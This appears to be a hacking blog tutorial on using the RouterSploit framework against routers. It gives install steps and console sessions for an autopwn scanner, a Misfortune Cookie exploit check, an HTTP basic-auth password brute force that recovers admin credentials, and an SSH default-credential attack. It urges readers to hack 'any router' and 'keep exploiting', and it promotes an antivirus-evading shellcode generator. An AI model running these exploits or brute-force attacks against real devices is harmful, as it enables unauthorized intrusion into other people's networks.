How To Hack A Router With RouterSploit ?!

0
10015

Routersploit is a tool similar to Metasploit but designed for the router.In this modern age of smart devices, as their number is growing the need of their security check for the vulnerability is also expanding.The companies are patching their products for security which are known as a security update.While most of the internet users only update their PC but forget about their router which is your gateway to the internet.Routers are the first devices which are exposed to the Internet openly and this protects your device from the darkness of the web using its firewall.Hence it’s become necessary to update their firmware regularly.

This article on routersploit will make you an expert on finding vulnerability of your router or any router.

So let’s get started,

About routersploit

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.

It consists of various modules that aid penetration testing operations:

exploits – modules that take advantage of identified vulnerabilities.

RouterSploit currently has support to a limited number of exploits, but they can be extended easily from popular exploit database online.

Creating Routersploit modules is very easy so that everyone can contribute to this excellent project.

The full process is described in RouterSploit Wiki.

In the wiki, you can find a code skeleton and all the necessary classes for module development.

The exploit stage in RouterSploit works pretty similar to Metasploit.

Anyone who had worked with Metasploit will find himself at home with RouterSploit.

Picking the desired exploit, eased with command completion leads to exploit configuration section after which we run our exploit.

RouterSploit also provides info about the exploits and the short description.

It is also possible to check if the target is vulnerable to particular exploit before you start the exploitation process

creds – modules designed to test credentials against network services

This allows you to run a brute force attack using dictionary on various network protocols like,

  • FTP
  • ssh
  • telnet
  • HTTP basic auth
  • HTTP form auth

This module is again classified into categories of two with default credentials and using a custom dictionary.

scanners – modules that check if a target is vulnerable to any exploit

This allows you to check whether any exploit module is vulnerable to your selected target.

Installing Routersploit

 

git clone https://github.com/reverse-shell/routersploit

./rsf.py

routersploit

 

Scanner

rsf > Use scanner/autopwn

rsf (AutoPwn) > Show Options

rsf (AutoPwn) > Set target (IP)

rsf (AutoPwn)> run

This scanner scan the target with popular exploits and list the exploits that are vulnerable

·Modules

To use a module type

rsf > use exploits/multi/misfortune_cookie

rsf (Misfortune Cookie) > show options




Target options:




   Name       Current Settings     Description

   ----       ----------------     -----------

   port       80                   Target port

   target                          Target address e.g. http://192.168.1.1

 

 

rsf (Misfortune Cookie) > set target 192.168.0.1

[+] {'target': '192.168.0.1'}

rsf (Misfortune Cookie) > check

[+] Target is vulnerable

rsf (Misfortune Cookie) >

 

·Credentials(Brute Force)

This method can be used when the module

rsf > use creds/http_basic_bruteforce

rsf (HTTP Basic Bruteforce) > show options

Target options:
Name        CurrentSettings       Description
----        ---------------       -----------
port           80                  target port
target                            Target IP address or file with target:port (file://)

Module options:

   Name          Current settings     Description                                  
   ----          ----------------     -----------                                   
   path          /                   URL Path                                     
   usernames     admin               Username or file with usernames (file://)
   passwords    file:///usr/share/routersploit/routersploit/wordlists/passwords.txt  Password or file with passwords(file://) 
   threads       8                   Numbers of threads                       
   verbosity     yes                 Display authentication attempts
rsf (HTTP Basic Bruteforce) > set target 192.168.0.2

[+] {'target': '192.168.0.2'}
rsf (HTTP Basic Bruteforce) > set passwords file:///usr/share/wordlists/nmap.lst

[+] {'passwords': 'file:///usr/share/wordlists/nmap.lst'}

rsf (HTTP Basic Bruteforce) > set verbosity no

[+] {'verbosity': 'no'}

rsf (HTTP Basic Bruteforce) > run

[*] Running module...

[*] Elapsed time:  1.97385120392 seconds
[+] Credentials found!

   Target          Port     Login     Password    
   ------          ----     -----     --------    
   192.168.0.2     80       admin     password    

rsf (HTTP Basic Bruteforce) >

For SSH:

rsf > use creds/

creds/ftp_bruteforce     creds/http_basic_bruteforce

creds/http_form_bruteforce       creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default 

creds/ftp_default            creds/http_basic_default     

creds/http_form_default      creds/ssh_bruteforce

creds/telnet_bruteforce      

rsf > use creds/ssh_default
rsf (SSH Default Creds) >

rsf (SSH Default Creds) > show options

Target options:    

Name       Current settings      Description              
-------   --------------------  ------------          
target                           Target IP address        
port              22             Target port

 

Module options:    
Name    CurrentSettings   Description
----    ---------------   -----------
threads    8

Numbers of threads

defaults

file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)

rsf (SSH Default Creds) > set target 192.168.1.53

[+] {'target': '192.168.1.53'}

rsf (SSH Default Creds) > run

[*] Running module...

[*] worker-0 process is starting...

[*] worker-1 process is starting...
[*] worker-2 process is starting...

[*] worker-3 process is starting...

[*] worker-4 process is starting...

[*] worker-5 process is starting...

[*] worker-6 process is starting...

[*] worker-7 process is starting...

[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'

[-] worker-1 Authentication failed. Username: '1234' Password: '1234'

[-] worker-0 Authentication failed. Username: '1111' Password: '1111'

[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'

[-] worker-2 Authentication failed. Username: '1502' Password: '1502' 

(..)

Routersploit is a great tool for finding vulnerabilities in any router and exploiting it

so find vulnerabilities and keep exploiting them and to know how to hack any Operating System using shell code generator, which is mostly undetected by antivirus software read the article on How To Hack Into Android & Systems Using Venom?

Happy Hunting…